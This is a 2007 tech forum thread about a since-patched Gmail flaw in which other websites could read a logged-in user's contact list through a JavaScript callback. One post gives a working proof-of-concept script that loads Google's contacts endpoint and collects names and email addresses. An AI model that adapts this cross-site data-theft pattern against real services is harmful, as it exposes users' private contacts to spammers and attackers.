1. Welcome to TechPowerUp Forums, Guest! Please check out our forum guidelines for info related to our community.

Gmail leaves your account open to spammers

Discussion in 'News' started by Jimmy 2004, Jan 1, 2007.

  1. Jimmy 2004

    Jimmy 2004 New Member

    Joined:
    Jan 15, 2005
    Messages:
    5,491 (1.51/day)
    Thanks Received:
    267
    Location:
    England
    A new flaw has been exposed in Google’s Gmail service which could allow hackers to get hold of your contacts. When you log into your Gmail (Googlemail in some countries) account, Google will put your details into a JavaScript file. Because of this, if you browse other websites whilst logged into your account, any of them could potentially declare the function “google” and be able to get hold of all of your contacts. The only two ways to ensure your privacy is safe are to disable JavaScript in all websites except those you trust or to not browse other sites whilst logged into any Google service. Admittedly Gmail is still only a beta, but a fault like this could be quite serious.

    Update: Disabling JavaScript did not solve this problem, however it appears that Google has now fixed this issue and your contacts list should be safe.

    Source: Engadget
     
    Last edited: Jan 1, 2007
  2. spectre440 New Member

    Joined:
    Jul 18, 2005
    Messages:
    948 (0.27/day)
    Thanks Received:
    15
    Location:
    Israel
    hopefully google will do the right thing, and plug that hole in their user's security.
     
  3. peach1971

    peach1971 New Member

    Joined:
    Oct 1, 2006
    Messages:
    652 (0.22/day)
    Thanks Received:
    46
    Location:
    Germany
    Just use Firefox + Add-on NoScript.

    Turn on Java to read your mails?
    Lol, how far have we gone... :D

    And here another usefull thing:
    http://www.customizegoogle.com/

    No more annoying ads! :D
     
  4. cdawall where the hell are my stars

    Joined:
    Jul 23, 2006
    Messages:
    20,684 (6.72/day)
    Thanks Received:
    2,984
    Location:
    some AF base
    wondered how my account got spammed
     
  5. Atech New Member

    Joined:
    Dec 28, 2006
    Messages:
    284 (0.10/day)
    Thanks Received:
    11
    This vulnerability has nothing to do with Java.
     
  6. pt

    pt not a suicide-bomber

    Joined:
    Mar 11, 2006
    Messages:
    8,981 (2.80/day)
    Thanks Received:
    208
    Location:
    Portugal
    no spam for me :)
    (i don't have java installed)
     
  7. peach1971

    peach1971 New Member

    Joined:
    Oct 1, 2006
    Messages:
    652 (0.22/day)
    Thanks Received:
    46
    Location:
    Germany
    Nothing to do with Java?

    Sorry, I don´t get it, Atech.
     
  8. Jimmy 2004

    Jimmy 2004 New Member

    Joined:
    Jan 15, 2005
    Messages:
    5,491 (1.51/day)
    Thanks Received:
    267
    Location:
    England
    Well, from what I read when posting this story it was a JS (JavaScript) file that causes this problem, and you disable Java to protect yourself so it must link to Java :confused:
     
  9. Atech New Member

    Joined:
    Dec 28, 2006
    Messages:
    284 (0.10/day)
    Thanks Received:
    11
    Code:
    <script language="javascript">
    function getContacts(response){
    var output = "";
    for(x=0;x<response.Body.Contacts.length;x++){
    output += response.Body.Contacts[x].Name + " <" + response.Body.Contacts[x].Email + "> ";
    }
    alert(output);
    }
    </script>
    
    <script language="javascript" xsrc="http://video.google.com/data/contacts?out=js&max=500 &psort=Affinity&callback=getContacts">
    </script>
    
    No calls to the Java API there.

    Edit: Gah to having to escape characters within code tags ...
     
    Last edited: Jan 1, 2007
  10. Jimmy 2004

    Jimmy 2004 New Member

    Joined:
    Jan 15, 2005
    Messages:
    5,491 (1.51/day)
    Thanks Received:
    267
    Location:
    England

    Whatever the case is, log into your Gmail and click here to see a nice list of your contacts. I'm not sure how a hacker can get hold of this, but I expect it's true. The reason that it may no longer be using Java is because Google claim to have fixed the issue. I'm not expert on Java, I'm just informing people of what I find.

    Edit: well I disabled JavaScript and that page still shows my contacts... but Gmail doesn't work. Probably need to clear my cookies ect.

    Edit2: Disabling JavaScript does NOT seem to solve this problem, that link still shows my contacts after I have cleared all my internet data with Javascript disabled... and I can't even use the Gmail service!!!

    Edit3: Couldn't the line
    script language="javascript" xsrc="http://video.google.com/data/contacts?out=js&max=500 &psort=Affinity&callback=getContacts"
    be linked to this?
     
    Last edited: Jan 1, 2007
  11. WarEagleAU

    WarEagleAU Bird of Prey

    Joined:
    Jul 9, 2006
    Messages:
    10,808 (3.50/day)
    Thanks Received:
    547
    Location:
    Gurley, AL
    Good thing I dont use Gmail, too hard to get one anywho.
     
  12. mout12

    mout12 New Member

    Joined:
    Mar 23, 2006
    Messages:
    114 (0.04/day)
    Thanks Received:
    0
    Location:
    Reno
    no. Go to mail.google.com, click 'SIGN UP', then enter your mobile phone number, and they'll send you a password via text message to your phone number. you'll have an account.
     
  13. Namslas90 New Member

    Joined:
    Aug 27, 2006
    Messages:
    4,851 (1.59/day)
    Thanks Received:
    555
    Location:
    Earth
    Just proves that you can't rely on anyone to secure your PC, but yourself!
     
  14. cdawall where the hell are my stars

    Joined:
    Jul 23, 2006
    Messages:
    20,684 (6.72/day)
    Thanks Received:
    2,984
    Location:
    some AF base
    whats your email i have some signups left
     
  15. pt

    pt not a suicide-bomber

    Joined:
    Mar 11, 2006
    Messages:
    8,981 (2.80/day)
    Thanks Received:
    208
    Location:
    Portugal
    i have 99, anyone wants :)?
     
  16. Bull Dog

    Joined:
    Jan 12, 2006
    Messages:
    146 (0.04/day)
    Thanks Received:
    18
    That link doesn't work for me.....meaning that when I am logged into my Gmail acct, and when I click on the link all I get is this:
    google ({
    Success: false,
    Errors: []
    })

    Using FireFox.
     
  17. Jimmy 2004

    Jimmy 2004 New Member

    Joined:
    Jan 15, 2005
    Messages:
    5,491 (1.51/day)
    Thanks Received:
    267
    Location:
    England
    Me too, I think they must've fixed it. I've updated the newspost again.

    When I clicked that link earlier it would bring up a list in which you could find any info about your contacts you had saved.
     

Currently Active Users Viewing This Thread: 1 (0 members and 1 guest)

Share This Page